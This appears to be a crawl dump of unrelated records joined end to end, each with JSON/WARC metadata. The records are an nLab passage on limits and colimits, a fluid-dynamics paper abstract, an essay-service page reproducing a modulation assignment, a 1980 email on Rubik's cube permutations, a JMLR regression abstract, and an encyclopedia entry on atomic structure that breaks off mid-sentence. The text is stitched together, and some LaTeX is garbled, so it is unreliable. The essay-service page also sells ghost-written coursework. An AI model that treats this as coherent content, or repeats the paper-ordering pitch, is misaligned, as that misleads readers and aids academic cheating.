\\underset{\\longrightarrow}{\\lim}_i X_i \\\\ & {}_{q'_i}\\searrow & \\downarrow^{\\mathrlap{\\exists ! \\phi}} \\\\ && \\tilde X }$\n\n$\\,$\n\nAll the limits and colimits over the free diagram in the above list of examples have special names:\n\n###### Example\n\n(initial object and terminal object)\n\nConsider the empty diagram (def. ).\n\n1. A cone over the empty diagram is just an object $X$, with no further structure or condition. The universal property of the limit “ast$'' over the empty diagram is hence that for every object$X$, there is a unique map of the form$X \\to \\ast$. Such an object$\\ast$is called a terminal object. 2. A co.cone? over the empty diagram is just an object $X$, with no further structure or condition. The universal property of the colimit$'' over the empty diagram is hence that for every object$X$, there is a unique map of the form$0 \\to X$. Such an object$\\ast$ is called a initial object.\n\n###### Example\n\n(Cartesian product and coproduct)\n\nLet $\\{X_i\\}_{i \\in I}$ be a discrete diagram (example ), i.e. just a set of objects.\n\n1. The limit over this diagram is called the Cartesian product, denoted $\\underset{i \\in I}{\\prod} X_i$;\n\n2. The colimit over this diagram is called the coproducts, denoted $\\underset{i \\in I}{\\coprod} X_i$.\n\n###### Example\n\n(equalizer)\n\nLet\n\n$X_1 \\underoverset {\\underset{\\phantom{AA}f_2\\phantom{AA}}{\\longrightarrow}} {\\overset{\\phantom{AA}f_1\\phantom{AA}}{\\longrightarrow}} {} X_2$\n\nbe a free diagram of the shape “pair of parallel morphisms” (example ).\n\nA limit over this diagram according to def. is also called the equalizer of the maps $f_1$ and $f_2$. This is a set or topological space $eq(f_1,f_2)$ equipped with a map $eq(f_1,f_2) \\overset{p_1}{\\longrightarrow} X_1$, so that $f_1 \\circ p_1 = f_2 \\circ p_1$ and such that if $Y \\to X_1$ is any other map with this property\n\n$\\array{ && Y \\\\ && \\downarrow & \\searrow \\\\ eq(f_1,f_2) &\\overset{p_1}{\\longrightarrow}& X_1 & \\underoverset {\\underset{\\phantom{AA}f_2\\phantom{AA}}{\\longrightarrow}} {\\overset{\\phantom{AA}f_1\\phantom{AA}}{\\longrightarrow}} {} & X_2 }$\n\nthen there is a unique factorization through the equalizer:\n\n$\\array{ && Y \\\\ &{}^{\\mathllap{\\exists !}}\\swarrow& \\downarrow & \\searrow \\\\ eq(f_1,f_2) &\\overset{p_1}{\\longrightarrow}& X_1 & \\underoverset {\\underset{f_2}{\\longrightarrow}} {\\overset{f_1}{\\longrightarrow}} {} & X_2 } \\,.$\n\nIn example we have seen that a cone over such a pair of parallel morphisms is a solution to the equation $f_1(x) = f_2(x)$.\n\nThe equalizer above is the space of all solutions of this equation.\n\n###### Example\n\n(pullback/fiber product and coproduct)\n\nConsider a cospan diagram (example )\n\n$\\array{ && Y \\\\ && \\downarrow^{\\mathrlap{f}} \\\\ X &\\underset{g}{\\longrightarrow}& Z } \\,.$\n\nThe limit over this diagram is also called the fiber product of $X$ with $Y$ over $Z$, and denoted $X \\underset{Z}{\\times}Y$. Thought of as equipped with the projection map to $X$, this is also called the pullback of $f$ along $g$\n\n$\\array{ X \\underset{X}{\\times} Z &\\longrightarrow& Y \\\\ \\downarrow &(pb)& \\downarrow^{\\mathrlap{f}} \\\\ X &\\underset{g}{\\longrightarrow}& Z } \\,.$\n\nDually, consider a span diagram (example )\n\n$\\array{ Z &\\overset{g}{\\longrightarrow}& Y \\\\ {}^{\\mathllap{f}}\\downarrow \\\\ X }$\n\nThe colimit over this diagram is also called the pushout of $f$ along $g$, denoted $X \\underset{Z}{\\sqcup}Y$:\n\n$\\array{ Z &\\overset{g}{\\longrightarrow}& Y \\\\ {}^{\\mathllap{f}}\\downarrow &(po)& \\downarrow \\\\ X &\\longrightarrow& X \\underset{Z}{\\sqcup} Y }$\n\n$\\,$\n\nHere is a more explicit description of the limiting cone over a diagram of sets:\n\n###### Proposition\n\n(limits and colimits of sets)\n\nLet $\\left\\{ X_i \\overset{f_\\alpha}{\\longrightarrow} X_j \\right\\}_{i,j \\in I, \\alpha \\in I_{i,j}}$ be a free diagram of sets (def. ). Then\n\n1. its limit cone (def. ) is given by the following subset of the Cartesian product $\\underset{i \\in I}{\\prod} X_i$ of all the sets $X_i$ appearing in the diagram\n\n$\\underset{\\longleftarrow}{\\lim}_i X_i \\,\\overset{\\phantom{AAA}}{\\hookrightarrow}\\, \\underset{i \\in I}{\\prod} X_i$\n\non those tuples of elements which match the graphs of the functions appearing in the diagram:\n\n$\\underset{\\longleftarrow}{\\lim}_{i} X_i \\;\\simeq\\; \\left\\{ (x_i)_{i \\in I} \\,\\vert\\, \\underset{ {i,j \\in I} \\atop { \\alpha \\in I_{i,j} } }{\\forall} \\left( f_{\\alpha}(x_i) = x_j \\right) \\right\\}$\n\nand the projection functions are $p_i \\colon (x_j)_{j \\in I} \\mapsto x_i$.\n\n2. its colimiting co-cone (def. ) is given by the quotient set of the disjoint union $\\underset{i \\in I}{\\sqcup} X_i$ of all the sets $X_i$ appearing in the diagram\n\n$\\underset{i \\in I}{\\sqcup} X_i \\,\\overset{\\phantom{AAA}}{\\longrightarrow}\\, \\underset{\\longrightarrow}{\\lim}_{i \\in I} X_i$\n\nwith respect to the equivalence relation which is generated from the graphs of the functions in the diagram:\n\n$\\underset{\\longrightarrow}{\\lim}_i X_i \\;\\simeq\\; \\left( \\underset{i \\in I}{\\sqcup} X_i \\right)/ \\left( (x \\sim x') \\Leftrightarrow \\left( \\underset{ {i,j \\in I} \\atop { \\alpha \\in I_{i,j} } }{\\exists} \\left( f_\\alpha(x) = x' \\right) \\right) \\right)$\n\nand the injection functions are the evident maps to equivalence classes:\n\n$q_i \\;\\colon\\; x_i \\mapsto [x_i] \\,.$\n###### Proof\n\nWe dicuss the proof of the first case. The second is directly analogous.\n\nFirst observe that indeed, by consturction, the projection maps $p_i$ as given do make a cone over the free diagram, by the very nature of the relation that is imposed on the tuples:\n\n$\\array{ && \\left\\{ (x_k)_{k \\in I} \\,\\vert\\, \\underset{ {i,j \\in I} \\atop { \\alpha \\in I_{i,j} } }{\\forall} \\left( f_{\\alpha}(x_i) = x_j \\right) \\right\\} \\\\ & {}^{\\mathllap{p_i}}\\swarrow && \\searrow^{\\mathrlap{p_j}} \\\\ X_i && \\underset{f_\\alpha}{\\longrightarrow} && X_j } \\,.$\n\nWe need to show that this is universal, in that any other cone over the free diagram factors universally through it. First consider the case that the tip of a give cone is a singleton:\n\n$\\array{ && \\ast \\\\ & {}^{\\mathllap{p'_i}}\\swarrow && \\searrow^{\\mathrlap{p'_j}} \\\\ X_i && \\underset{f_\\alpha}{\\longrightarrow} && X_j } \\,.$\n\nThis is hence equivalently for each $i \\in I$ an element $x'_i \\in X_i$, such that for all $i, j \\in I$ and $\\alpha \\in I_{i,j}$ then $f_\\alpha(x'_i) = x'_j$. But this is precisely the relation used in the construction of the limit above and hence there is a unique map\n\n$\\ast \\longrightarrow \\left\\{ (x_k)_{k \\in I} \\,\\vert\\, \\underset{ {i,j \\in I} \\atop { \\alpha \\in I_{i,j} } }{\\forall} \\left( f_{\\alpha}(x_i) = x_j \\right) \\right\\}$\n\nsuch that for all $i \\in I$ we have\n\n$\\array{ \\ast \\\\ \\downarrow & \\searrow^{\\mathrlap{p'_i}} \\\\ \\left\\{ (x_k)_{k \\in I} \\,\\vert\\, \\underset{ {i,j \\in I} \\atop { \\alpha \\in I_{i,j} } }{\\forall} \\left( f_{\\alpha}(x_i) = x_j \\right) \\right\\} &\\underset{p_i}{\\longrightarrow}& X_i }$\n\nnamely that map is the one that picks the element $(x'_i)_{i \\in I}$.\n\nThis shows that every cone with tip a singleton factors uniquely through the claimed limiting cone. But then for a cone with tip an arbitrary set $Y$, this same argument applies to all the single elements of $Y$.\n\nLast revised on May 8, 2017 at 12:51:45. See the history of this page for a list of all contributions to it." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91763777,"math_prob":0.9994242,"size":8318,"snap":"2021-31-2021-39","text_gpt3_token_len":1829,"char_repetition_ratio":0.17248015,"word_repetition_ratio":0.15293296,"special_character_ratio":0.20810291,"punctuation_ratio":0.09626346,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999306,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-08-02T19:46:59Z\",\"WARC-Record-ID\":\"<urn:uuid:7cc538bc-4a9a-4778-83a2-27f4a1dcc2c6>\",\"Content-Length\":\"114679\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c402c571-f5a6-41ec-abb6-c8b61390c752>\",\"WARC-Concurrent-To\":\"<urn:uuid:9923b056-5582-4a70-9d6d-ade408ebb1fe>\",\"WARC-IP-Address\":\"172.67.137.123\",\"WARC-Target-URI\":\"https://ncatlab.org/nlab/show/free+diagram\",\"WARC-Payload-Digest\":\"sha1:UZVNFZRPHFRUEMAQ4FENTFBGU6JMR3YP\",\"WARC-Block-Digest\":\"sha1:JCHW4U5NE4TLT3B6MBSMBU3VQBMZP4S4\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154356.39_warc_CC-MAIN-20210802172339-20210802202339-00634.warc.gz\"}"}
https://pureportal.strath.ac.uk/en/publications/real-gas-effects-for-compressible-nozzle-flows
[ "# Real gas effects for compressible nozzle flows\n\nD. Drikakis, S. Tsangaris\n\nResearch output: Contribution to journalArticlepeer-review\n\n25 Citations (Scopus)\n\n## Abstract\n\nNumerical simulation of compressible nozzle flows of real gas with or without the addition of heat is presented. A generalized real gas method, using an upwind scheme and curvilinear coordinates, is applied to solve the unsteady compressible Euler equations in axisymmetric form. The present method is an extension of a previous 2D method, which was developed to solve the problem for a gas having the general equation of state in the form p = p(ρ, i). In the present work the method is generalized for an arbitrary P-V-T equation of state introducing an iterative procedure for the determination of the temperature from the specific internal energy and the flow variables. The solution procedure is applied for the study of real gas effects in an axisymmetric nozzle flow.\nOriginal language English 115-120 6 Journal of Fluids Engineering 115 1 https://doi.org/10.1115/1.2910092 Published - 1 Mar 1993\n\n## Keywords\n\n• equations of state\n• gas dynamics\n• heat transfer\n• iterative methods\n• mathematical methods\n• nozzles\n• temperature\n• curvilinear coordinates\n• flow variables\n• real gas effects\n• specific internal energy\n• Euler equations\n• upwind schemes\n• compressible flow\n• computer simulation\n\n## Fingerprint\n\nDive into the research topics of 'Real gas effects for compressible nozzle flows'. Together they form a unique fingerprint." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8581717,"math_prob":0.6249996,"size":1286,"snap":"2022-40-2023-06","text_gpt3_token_len":293,"char_repetition_ratio":0.11778471,"word_repetition_ratio":0.0,"special_character_ratio":0.21150856,"punctuation_ratio":0.044554457,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9656622,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-04T23:05:44Z\",\"WARC-Record-ID\":\"<urn:uuid:f4fa620a-67aa-4344-a1d1-71178f90dd98>\",\"Content-Length\":\"52734\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e82704d5-2c1e-49b4-9966-03442325d074>\",\"WARC-Concurrent-To\":\"<urn:uuid:def70444-c02d-41f6-a796-28028f97e433>\",\"WARC-IP-Address\":\"54.74.68.52\",\"WARC-Target-URI\":\"https://pureportal.strath.ac.uk/en/publications/real-gas-effects-for-compressible-nozzle-flows\",\"WARC-Payload-Digest\":\"sha1:JVIPAQDJFPCCAUVYX63PZW5HRC2B7BF5\",\"WARC-Block-Digest\":\"sha1:VQD7AA6KFZPQLOQXGO4UAYGH7HILZE7W\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337529.69_warc_CC-MAIN-20221004215917-20221005005917-00728.warc.gz\"}"}
https://essaysprompt.com/critically-evaluate-the-baseband-demodulation-and-detection-techniques-critically-evaluate-digital-modulation-techniques-including-multi-level-digital-modulation/
[ "# Critically evaluate the baseband demodulation and detection techniques Critically evaluate digital modulation techniques including multi-level digital modulation\n\nDifferentiate the types of pulse modulation techniques implemented in communication systems;\nCritically evaluate the baseband demodulation and detection techniques;\nCritically evaluate digital modulation techniques including multi-level digital modulation.\nGuidelines:\nEach question carries 20 marks.\nAssignment answers must be computer typed. Please do not write question statement. Just mention the question number.\nFont – Times New Roman\nFont – Style – Regular\nFont – Size – 12\nSoft copy of the assignment is to be submitted online in Moodle through turnitin.\nEach student has to do the assignment individually.\nExplain with suitable diagrams wherever required.\nHeading should be with Font Size 14, Bold, and Underline.\nYou can refer books in Library or use internet resource. But you should not cut and paste material from internet nor provide photocopied material from books. The assignment answers should be in your own words after understanding the matter from the above resources.\nRules & Regulations\nIf any coursework assessment is found to be copied from other candidates using unacceptable means, then it shall be cancelled and the total marks awarded will be zero. No chance of resubmission or appeal will be given*.\nYour source of information should be mentioned in the reference page clearly. (For example: If it’s from book, you have to mention the full details of the book with title, author name, edition and publisher’s name. If it is from the internet you have to mention the correct URL). Otherwise the assignment will be considered as plagiarized*.\nThe students may be asked to appear for a viva voce to validate the assignment solutions submitted. The viva voce does not carry any marks.\nTitle Page must have Assignment Name, Module name, your name, ID, Section and the name of the faculty.\nFor late submission, 5% of the awarded marks will be deducted for each working day.\nFor plagiarism, please refer to student guide and clarification uploaded on Moodle.\nRefer MIG for feedback dates on assignment.\nNo assignment will be accepted after one week from the date of submission*.\nDate of submission 27/12/2016\n* Refer to the MIG for MEC policy on academic integrity and late submission.\nA waveform that is band limited to 50 k Hz is sampled every 10µs. Show graphically that these samples uniquely characterize the waveform. (Use a sinusoidal example. Avoid sampling at points where the waveform equals zero.) (6 Marks)\nIf the samples are taken 30µs apart instead of 10µs,show graphically that the waveforms other than the original can be characterized by the samples.\n(6 Marks)\nA Sinusoidal voice signal s(t)=cos?(6000pt) is to be transmitted using either PCM or DM. The sampling rate for PCM is 8kHz and for the transmission with DM,the step size ? is decided to be of 31.25mV.The slope overload distortion is to be avoided.Assume that the number of quantization levels for a PCM system is 64. Determine the signaling rates of the both the systems and also comment on the result. (8 Marks)\nA compact disc(CD) records audio signals digitally by using PCM. Assume that the audio signal bandwidth equals 15kHz.\nIf the Nyquist sample are uniformly quantized into L=65,536 levels and then binary-coded, determine the number of binary digits required to encode a sample.\nIf the audio signal has average power of 0.1 W and peak voltage of 1 V. Find the resulting ratio of signal to quantization noise (SQNR) of the uniform quantizer output in part (i).\nDetermine the number of binary digits per second (bit/s) required to encode the audio signal and minimum bandwidth required to transmit the encoded signal.\nPractically signals are sample well above the Nyquist rate. Practical CDs use 44100 samples per second.If L=65536,determine the number of bits per second required to encode the signal,and the minimum bandwidth required to transmit the encoded signal. (10 Marks)\nGiven an analog waveform that has been sampled at its Nyquist rate, fs using natural sampling, prove that a waveform (proportional to the original waveform) can be recovered from the samples, using recovery technique shown in figure 2. The parameter mfs, is the frequency of local oscillator, where m is an integer.\n(10 Marks)\n(Hint: ? x?_p (t)=?_(n=-8)^8¦C_n e^(j2pnf_s t) x_s (t)=x(t).x_p (t)))\nConsider the signals shown below Figure 1.\nFigure 1\nEach of the signals shown in Figure 1 can be written using the form Asin(2p ft +f). For each signal, determine the values of A,f and f.\nConsider a composite signal which contains each of the four signals shown in Figure 1 added together. Show the combined signals amplitude versus frequency-domain plot. What is the equation for this combined signal? What is the bandwidth of this signal?\nIf the composite signal from part (ii) was passed through a special filter that removes its DC component, what would be the bandwidth of the filtered signal?\n(12 Marks)\nCoherent detectors are used to detect FSK signal with a rate of 2Mbps. Assuming AWGN channel with the noise power spectral density No/2 = 10-20W/Hz. Determine the probability error. Assume the amplitude of the received signal is 1µV. (8 Marks)\nImagine you wish to transmit the last four digits of your ID no. First you will need to convert your student ID from its decimal (base 10) representation into a 28-bit binary (base 2) representation. Using clearly labeled diagrams, show an encoding of your ID using:\n[14 Marks]\nNRZ-L signal,\nNRZ-AMI\nBi-Ø-L\nDelay Modulation\n(Note that ASCII Conversion sheet provided to you)\nA binary communication system transmits signals si(t) (i=1,2).The receiver test statistic z(T)=ai+n0 ,where the signal component ai is either a1=+1 or a2=-1 and the noise component n0 is uniformly distributed, yielding the conditional density functions given by\nand\nFind the probability of a bit error, PB for the case of equally likely signaling and the use of an optimum decision threshold. (6 Marks)\nShow that for a bit stream b(t) =011011100001, the MSK waveform has phase continuity with the help of suitable mathematical analysis and waveforms. (20 Marks)\nAssume that m=5 for f_H=(m+1) f_b/4\nf_L=(m-1) f_b/4\n\n### Save your time - order a paper!\n\nGet your paper written from scratch within the tight deadline. Our service is a reliable solution to all your troubles. Place an order on any task and we will take care of it. You won’t have to worry about the quality and deadlines\n\nOrder Paper Now" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8772671,"math_prob":0.942196,"size":6834,"snap":"2023-40-2023-50","text_gpt3_token_len":1517,"char_repetition_ratio":0.11522694,"word_repetition_ratio":0.025408348,"special_character_ratio":0.21832016,"punctuation_ratio":0.09318716,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98137856,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-25T15:58:21Z\",\"WARC-Record-ID\":\"<urn:uuid:f447508e-85e6-4e46-aa96-cb2913bb7678>\",\"Content-Length\":\"100168\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:03f468d9-6541-402b-abd5-63b493074d62>\",\"WARC-Concurrent-To\":\"<urn:uuid:d1a7b625-8d41-4e2d-9066-69894dca569f>\",\"WARC-IP-Address\":\"104.21.49.145\",\"WARC-Target-URI\":\"https://essaysprompt.com/critically-evaluate-the-baseband-demodulation-and-detection-techniques-critically-evaluate-digital-modulation-techniques-including-multi-level-digital-modulation/\",\"WARC-Payload-Digest\":\"sha1:LOXPYAULUOOHOWXTNRSYQSU55O5OF6B4\",\"WARC-Block-Digest\":\"sha1:CEEXPH6FJ6J72NKQEHJCHRCESAW22R5A\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233509023.57_warc_CC-MAIN-20230925151539-20230925181539-00642.warc.gz\"}"}
http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/Tom_Davis__Cube_Permutations.html
[ "", null, "", null, "", null, "Date: Mon, 04 Aug 80 22:04:00 -0700 (PDT)", null, "", null, "", null, "From: Tom Davis <Davis@OFFICE-3 >\n~~~", null, "", null, "Subject: Cube Permutations\n\nThe following two transformations are useful in demonstrating that all of the\nclaimed elements of an equivalence class of positions can be reached. Using\nthe RLFBUP notation, the transformation RB'R'B'U'BU reverses two of the corner\ncubies and leaves all other corner cubies in place (It does, however, shuffle\naround the side cubies, and does some random twists to the corners). If the\nabove transformation is repeated four times in a row, everything is left\nexactly fixed, except that three corner cubies are each rotated one-third of a\nturn. By then performing the inverse of this operation on two of the three\ncorners which were turned and a new corner, it is not hard to see that any two\ncorners can be the only ones moved, and that they are each rotated one-third of\na turn in opposite directions.\n\nIf we look at just the corners alone, and ignore in-place rotation, since we\ncan exchange any adjacent pair, we can obviously get to all permutations of the\ncorners. A similar argument can be made to show that all the edge cubies can\nbe arranged arbitrarily (permuted arbitrarily, that is). An easy\ntransformation rotates three of them (among themselves) on a face, and since we\nare also allowed to rotate the face, it is easy to generate a transposition of\nany pair.\n\nUnfortunately, the two operations described above are not independent. If we\njust look at the blocks and label them ignoring color, a primitive (one-quarter\nturn) transformation moves four corners into four corners, and four edge cubies\ninto four edge cubies. If this is viewed as a member of a permutation group,\nit is obviously even (the set being permuted is all the movable cubes). Thus,\nat least half of the positions are impossible. If we ignore the corner cubies,\nand look at the colors of the edge cubies, every primitive rotation rotates the\nfour front colors, and the four colors around the outside, again, an even\npermutation. Since one of the above used coloring and no corner cubes, and the\nother did not, there must be at least a factor of 4 impossible positions. A\nmuch more complicated argument shows the necessity of a factor of three in the\nset of impossibles. (Does anyone know of a simple way to see this? I just did\nthe obvious thing of defining \"standard\" orientations of every cube in every\ncorner, and showed that all the primitive transformations caused the total\nrotation away from standard to be a multiple of 2 pi.)\n\nUsing the transformation which flips any two in place, and the two discussed\nabove, it is not hard to see that the factor is at most and at least 12.\n\nBoy, It sure is hard to prove things on a computer. On myy notes with\ndiagrams and all, this is perfectly clear, but I get confused trying to read my\nonline proof. I hope that someone can make some sense out of it.\n\n```-------\n```", null, "", null, "", null, "", null, "", null, "" ]
[ null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_next_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_prev_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_up_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_next_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_prev_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_up_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_prev_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_up_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_next_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_prev_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_up_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/go_top_btn.gif", null, "http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/help_btn.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9411564,"math_prob":0.91706586,"size":2788,"snap":"2022-05-2022-21","text_gpt3_token_len":623,"char_repetition_ratio":0.1329023,"word_repetition_ratio":0.020449897,"special_character_ratio":0.2069584,"punctuation_ratio":0.09489051,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95488554,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-17T14:39:06Z\",\"WARC-Record-ID\":\"<urn:uuid:4f13b003-bfd4-4d99-859a-630928bbb3fc>\",\"Content-Length\":\"4707\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:726bf193-895c-4cd3-a987-84b899281cb5>\",\"WARC-Concurrent-To\":\"<urn:uuid:b50f36c7-bce1-4763-8812-64c07260f93c>\",\"WARC-IP-Address\":\"137.226.152.76\",\"WARC-Target-URI\":\"http://www.math.rwth-aachen.de/~Martin.Schoenert/Cube-Lovers/Tom_Davis__Cube_Permutations.html\",\"WARC-Payload-Digest\":\"sha1:IIDLPYXEFVIIXZETCCS7JYKTORLGICB2\",\"WARC-Block-Digest\":\"sha1:4BGSDULRVRZVV3RPHIH6TCPMVKQ3ZIG4\",\"WARC-Identified-Payload-Type\":\"message/rfc822\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662517485.8_warc_CC-MAIN-20220517130706-20220517160706-00467.warc.gz\"}"}
https://jmlr.org/beta/papers/v22/20-768.html
[ "# Prediction Under Latent Factor Regression: Adaptive PCR, Interpolating Predictors and Beyond\n\nXin Bing, Florentina Bunea, Seth Strimas-Mackey, Marten Wegkamp.\n\nYear: 2021, Volume: 22, Issue: 177, Pages: 1−50\n\n#### Abstract\n\nThis work is devoted to the finite sample prediction risk analysis of a class of linear predictors of a response $Y\\in \\mathbb{R}$ from a high-dimensional random vector $X\\in \\mathbb{R}^p$ when $(X,Y)$ follows a latent factor regression model generated by a unobservable latent vector $Z$ of dimension less than $p$. Our primary contribution is in establishing finite sample risk bounds for prediction with the ubiquitous Principal Component Regression (PCR) method, under the factor regression model, with the number of principal components adaptively selected from the data---a form of theoretical guarantee that is surprisingly lacking from the PCR literature. To accomplish this, we prove a master theorem that establishes a risk bound for a large class of predictors, including the PCR predictor as a special case. This approach has the benefit of providing a unified framework for the analysis of a wide range of linear prediction methods, under the factor regression setting. In particular, we use our main theorem to recover known risk bounds for the minimum-norm interpolating predictor, which has received renewed attention in the past two years, and a prediction method tailored to a subclass of factor regression models with identifiable parameters. This model-tailored method can be interpreted as prediction via clusters with latent centers. To address the problem of selecting among a set of candidate predictors, we analyze a simple model selection procedure based on data-splitting, providing an oracle inequality under the factor model to prove that the performance of the selected predictor is close to the optimal candidate. We conclude with a detailed simulation study to support and complement our theoretical results." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8872954,"math_prob":0.894874,"size":1955,"snap":"2021-43-2021-49","text_gpt3_token_len":389,"char_repetition_ratio":0.12608919,"word_repetition_ratio":0.0,"special_character_ratio":0.18772379,"punctuation_ratio":0.09495549,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9903628,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-20T00:29:33Z\",\"WARC-Record-ID\":\"<urn:uuid:6c6c4133-2ccb-4ba4-ab94-c9ff1b7c8d5d>\",\"Content-Length\":\"8240\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ce140b4e-b9a8-482f-ac85-450216ae2d94>\",\"WARC-Concurrent-To\":\"<urn:uuid:080042f6-4604-4e78-9177-7a88d2e58590>\",\"WARC-IP-Address\":\"128.52.131.20\",\"WARC-Target-URI\":\"https://jmlr.org/beta/papers/v22/20-768.html\",\"WARC-Payload-Digest\":\"sha1:NFXQI5EXY4NHLOOSG4ZDA5G6SRIXOZ6S\",\"WARC-Block-Digest\":\"sha1:N6B6YP2BGYN4SL6E5QTLW47KT2Y3SUBJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585290.83_warc_CC-MAIN-20211019233130-20211020023130-00205.warc.gz\"}"}
https://encyclopedia2.thefreedictionary.com/Atomic+structure+and+spectra
[ "# Atomic structure and spectra\n\n## Atomic structure and spectra\n\nThe idea that matter is subdivided into discrete building blocks called atoms, which are not divisible any further, dates back to the Greek philosopher Democritus. His teachings of the fifth century b.c. are commonly accepted as the earliest authenticated ones concerning what has come to be called atomism by students of Greek philosophy. The weaving of the philosophical thread of atomism into the analytical fabric of physics began in the late eighteenth and the nineteenth centuries. Robert Boyle is generally credited with introducing the concept of chemical elements, the irreducible units of which are now recognized as individual atoms of a given element. In the early nineteenth century John Dalton developed his atomic theory, which postulated that matter consists of indivisible atoms as the irreducible units of Boyle's elements, that each atom of a given element has identical attributes, that differences among elements are due to fundamental differences among their constituent atoms, that chemical reactions proceed by simple rearrangement of indestructible atoms, and that chemical compounds consist of molecules which are reasonably stable aggregates of such indestructible atoms.\n\n#### Electromagnetic nature of atoms\n\nThe work of J. J. Thomson in 1897 clearly demonstrated that atoms are electromagnetically constituted and that from them can be extracted fundamental material units bearing electric charge that are now called electrons. The electrons of an atom account for a negligible fraction of its mass. By virtue of overall electrical neutrality of every atom, the mass must therefore reside in a compensating, positively charged atomic component of equal charge magnitude but vastly greater mass. See Electron\n\nThomson's work was followed by the demonstration by Ernest Rutherford in 1911 that nearly all the mass and all of the positive electric charge of an atom are concentrated in a small nuclear core approximately 10,000 times smaller in extent than an atomic diameter. Niels Bohr in 1913 and others carried out some remarkably successful attempts to build solar system models of atoms containing planetary pointlike electrons orbiting around a positive core through mutual electrical attraction (though only certain “quantized” orbits were “permitted\"). These models were ultimately superseded by nonparticulate, matter-wave quantum theories of both electrons and atomic nuclei. See Quantum mechanics\n\nThe modern picture of condensed matter (such as solid crystals) consists of an aggregate of atoms or molecules which respond to each other's proximity through attractive electrical interactions at separation distances of the order of 1 atomic diameter (approximately 10-10 m) and repulsive electrical interactions at much smaller distances. These interactions are mediated by the electrons, which are in some sense shared and exchanged by all atoms of a particular sample, and serve as an interatomic glue that binds the mutually repulsive, heavy, positively charged atomic cores together. See Solid-state physics\n\n#### Bohr atom\n\nThe hydrogen atom is the simplest atom, and its spectrum (or pattern of light frequencies emitted) is also the simplest. The regularity of its spectrum had defied explanation until Bohr solved it with three postulates, these representing a model which is useful, but quite insufficient, for understanding the atom.\n\nPostulate 1: The force that holds the electron to the nucleus is the Coulomb force between electrically charged bodies.\n\nPostulate 2: Only certain stable, nonradiating orbits for the electron's motion are possible, those for which the angular momentum associated with the motion of an electron in its orbit is an integral multiple of h2&pgr; (Bohr's quantum condition on the orbital angular momentum). Each stable orbit represents a discrete energy state.\n\nPostulate 3: Emission or absorption of light occurs when the electron makes a transition from one stable orbit to another, and the frequency &ngr; of the light is such that the difference in the orbital energies equals h&ngr; (A. Einstein's frequency condition for the photon, the quantum of light).\n\nHere the concept of angular momentum, a continuous measure of rotational motion in classical physics, has been asserted to have a discrete quantum behavior, so that its quantized size is related to Planck's constant h, a universal constant of nature. Velocity v, in rotational motion about a central body, is defined as the product of the component.\n\nModern quantum mechanics has provided justification of Bohr's quantum condition on the orbital angular momentum. It has also shown that the concept of definite orbits cannot be retained except in the limiting case of 